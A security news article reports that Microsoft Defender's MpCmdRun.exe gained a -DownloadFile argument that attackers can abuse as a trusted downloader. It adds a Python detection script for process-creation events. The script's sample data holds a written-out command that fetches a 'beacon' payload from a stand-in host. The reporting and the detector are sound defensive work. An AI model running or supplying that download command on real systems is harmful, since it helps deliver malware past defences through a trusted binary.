Attackers can use Microsoft Defender to download viruses and malware
The latest update to Microsoft Defender Antivirus for Windows 10 makes it possible to use the antivirus itself to download viruses, malware, and other files onto a Windows computer.
Security researcher Mohammad Askar discovered this download capability. The Microsoft Defender command-line tool update adds a new command-line argument, -DownloadFile. It allows a local user to make the Microsoft Antimalware Service Command Line Utility (MpCmdRun.exe) fetch a file from a remote location with a single command.
“Well, you can download a file from the internet using Windows Defender itself. In this example, I was able to download Cobalt Strike beacon using the binary ‘MpCmdRun.exe’ which is the ‘Microsoft Malware Protection Command Line’,” Askar stated on Twitter.
This effectively lets a local attacker use Defender as a so-called “living-off-the-land binary” (LOLBin): a legitimate, usually signed and trusted program that is abused for malicious purposes, in this case an antivirus program being used to download a virus. Because the binary is Microsoft's own, the download is far less likely to be blocked or flagged than a custom downloader would be.
It appears this capability was added to Defender with the July update, version 4.18.2007.8, so the functionality has been present for almost two months now.
Bleeping Computer tested the download method found by Askar, using it to fetch the WastedLocker ransomware, which recently caused serious problems in Garmin’s infrastructure and prompted the company to reportedly pay a multi-million dollar ransom.
“The good news is that Microsoft Defender will detect malicious files downloaded with MpCmdRun.exe, but it is unknown if other AV software will allow this program to bypass their detections,” write Bleeping Computer specialists.
Note that only a local user can initiate such a download; the feature does not open a remote attack path by itself, but it gives an attacker who already has a foothold a convenient, trusted downloader.
Still, this adds a headache for network administrators: they now have one more legitimate Windows executable whose command lines they need to monitor so that it is not turned against the enterprise.
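As an added example that is not part of the original article or of any Microsoft tooling, the script below shows the kind of check an administrator can run over process-creation telemetry to catch this abuse. The events are constructed to resemble Sysmon Event ID 1 fields (Image, CommandLine, ParentImage); the hostnames, URL, file paths and parent processes are assumptions for illustration, and the -url / -path parameters shown in the sample command line are the ones MpCmdRun.exe takes alongside -DownloadFile.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed process-creation events in the shape of Sysmon Event ID 1.
# Paths, parents and the URL are assumptions, not captured telemetry.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {
        # Routine signature update launched by the Defender service: benign.
        "Image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
        "CommandLine": '"MpCmdRun.exe" -SignatureUpdate',
        "ParentImage": r"C:\Windows\System32\svchost.exe",
    },
    {
        # Platform updates install MpCmdRun.exe under ProgramData as well,
        # so the check matches on the file name rather than a fixed directory.
        "Image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2007.8-0\MpCmdRun.exe",
        "CommandLine": r'"MpCmdRun.exe" -DownloadFile -url https://example.invalid/beacon.bin -path C:\Users\Public\beacon.bin',
        "ParentImage": r"C:\Windows\System32\cmd.exe",
    },
    {
        # Same flag on an unrelated binary: not the pattern we are hunting.
        "Image": r"C:\Windows\System32\notepad.exe",
        "CommandLine": "notepad.exe -DownloadFile",
        "ParentImage": r"C:\Windows\explorer.exe",
    },
]

URL_RE = re.compile(r'-url\s+("[^"]*"|\S+)', re.IGNORECASE)
PATH_RE = re.compile(r'-path\s+("[^"]*"|\S+)', re.IGNORECASE)


@dataclass
class Finding:
    image: str
    parent: str
    url: Optional[str]
    path: Optional[str]


def is_defender_download(event: Dict[str, str]) -> bool:
    """True when MpCmdRun.exe is invoked with the -DownloadFile argument.

    Matching on -DownloadFile specifically keeps Defender's own routine
    invocations (signature updates, scans) out of the results.
    """
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "").lower()
    return image.endswith("\\mpcmdrun.exe") and "-downloadfile" in cmd


def _capture(regex: re.Pattern, cmd: str) -> Optional[str]:
    m = regex.search(cmd)
    return m.group(1).strip('"') if m else None


def extract_finding(event: Dict[str, str]) -> Finding:
    """Pull the remote URL and local destination out of a flagged event."""
    cmd = event.get("CommandLine", "")
    return Finding(
        image=event.get("Image", ""),
        parent=event.get("ParentImage", ""),
        url=_capture(URL_RE, cmd),
        path=_capture(PATH_RE, cmd),
    )


def hunt(events: List[Dict[str, str]]) -> List[Finding]:
    """Return one Finding per MpCmdRun.exe -DownloadFile invocation."""
    return [extract_finding(e) for e in events if is_defender_download(e)]


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"MpCmdRun download: {f.url} -> {f.path} (parent: {f.parent})")
```

In a real deployment the same logic belongs in the SIEM query or EDR rule that already receives process-creation events; the parent process and destination path are what turn a raw hit into a triage decision, since a shell or Office process spawning this command is far more suspicious than the Defender service itself.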
As a reminder, last month Microsoft deprecated the DisableAntiSpyware registry value in Microsoft Defender: whatever it is set to (0 left the antivirus enabled, 1 disabled it) is ignored once the update is installed. Thus, the tech giant took away from users the ability to permanently disable the antivirus solution.
At the same time, Microsoft Defender behaves very strangely, if not to say impudently: we wrote earlier that Microsoft Defender flagged CCleaner as a malicious application, and then treated the HOSTS file as malicious if it blocks telemetry. It looks like Windows users have a real Pandora’s Box on their computers.